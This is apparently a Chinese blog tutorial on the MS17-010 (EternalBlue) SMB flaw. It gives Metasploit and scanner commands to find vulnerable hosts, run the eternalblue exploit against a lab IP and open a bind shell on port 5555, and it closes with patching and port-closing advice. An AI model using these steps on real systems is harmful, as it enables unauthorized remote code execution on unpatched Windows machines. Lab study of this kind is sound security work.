MS17-010(永恒之蓝) 漏洞检测及利用教程


漏洞描述

  攻击者向 Microsoft 服务器消息块SMB服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。

影响版本

  • Windows Vista
  • Windows 7
  • Windows 8.1
  • Windows RT 8.1
  • Windows 10
  • Windows Server 2008 和 Windows Server 2008 R2
  • Windows Server 2012 和 Windows Server 2012 R2
  • Windows Server 2016

漏洞检测


kali

#启动msf
msfconsole

search ms17-010
use auxiliary/scanner/smb/smb_ms17_010

#设置目标ip
set rhosts 192.168.234.132

run

提示 Host is likely VULNERABLE to MS17-010 表示存在漏洞

在这里插入图片描述

windows

利用工具:
https://github.com/holmesian/ms17_010_scan

单个ip检测:

#ms17010scan-h-n-amd64-1.exe -h ip
ms17010scan-h-n-amd64-1.exe -h 192.168.234.132

多ip扫描:

#ms17010scan-h-n-amd64-1.exe -n ip/24
ms17010scan-h-n-amd64-1.exe -n 192.168.234.0/24

在这里插入图片描述

漏洞利用

KALI:

#启动msf
msfconsole

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue

#设置目标ip
set rhosts 192.168.234.132

run

在这里插入图片描述

无公网ip反弹shell

  假设你只有一台pc机,无公网ip接受漏洞反弹回来的shell,只需要更改msf的攻击载荷即可

#查看攻击在和
show payloads 

在这里插入图片描述

#修改攻击载荷为 generic/shell_bind_tcp
set payload 1

#查看配置,我们只需要设置
show options 
#设置目标ip
set rhost 192.168.234.134
set lport 5555

在这里插入图片描述

run

在这里插入图片描述

  对于我的理解为 generic/shell_bind_tcp payload 是在目标机子上打开5555端口,我们去进行主动连接获取shell。

在这里插入图片描述


  而原先使用的 windows/x64/meterpreter/reverse_tcp 是让对方主动连接我们监听的端口

在这里插入图片描述


漏洞加固

1、 更新操作系统补丁。
2、 关闭操作系统139、445等多余端口。

  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值